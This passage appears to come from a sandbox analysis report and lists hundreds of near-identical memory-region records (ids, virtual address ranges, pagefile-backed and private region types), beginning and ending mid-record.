0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 7802 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7803 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7804 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7805 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7806 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7807 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7808 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7809 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7810 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7811 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7812 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7813 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7814 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7815 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7816 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7817 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7818 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7819 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7820 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7821 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7822 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7823 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7824 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7825 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7826 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7827 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7828 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7829 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7831 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7832 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7833 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7834 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7835 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7836 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7837 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7838 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7839 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7840 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7841 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7842 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7843 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7844 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7845 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7846 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7847 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7848 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7849 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7850 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7851 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 7852 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 7853 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 7854 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 7899 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7900 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7901 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7902 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7903 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7904 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7905 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7906 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7907 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7908 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7909 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7910 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7911 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7912 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7913 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7914 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7915 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7916 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7917 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7918 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7919 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7920 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7921 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7922 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7923 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7924 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7925 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7926 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7927 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7928 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7929 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7930 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7931 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7932 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7933 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7934 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7935 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7936 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7937 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7938 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7939 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7955 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7956 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7957 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7958 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7959 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7960 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7961 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7962 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7963 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8051 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 8052 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 8053 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 8054 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 8055 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8056 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8057 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8058 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8059 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8060 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8061 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8062 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8063 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8064 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8065 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8066 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8067 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8068 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8069 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8070 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8071 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8072 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8073 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8074 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8075 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8076 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8077 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8078 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8079 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8080 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8081 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8082 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8083 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8084 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8085 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8086 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8087 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8088 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8089 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8090 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8091 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8092 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8123 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8124 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8125 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8126 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8127 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8128 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8129 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8130 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8131 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8132 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8133 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 8134 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 8135 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 8136 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 8137 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8138 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8139 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8140 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8141 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8142 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8143 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8144 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8145 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8146 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8147 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8148 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8149 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8150 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8151 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8157 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8158 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8159 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8160 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8161 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8162 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8163 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8164 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8165 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8166 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8167 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8168 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8169 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8170 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8171 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8172 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8173 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8174 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8175 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8176 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8177 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8178 start_va = 0x2a0000 end_va = 0x2b1fff entry_point 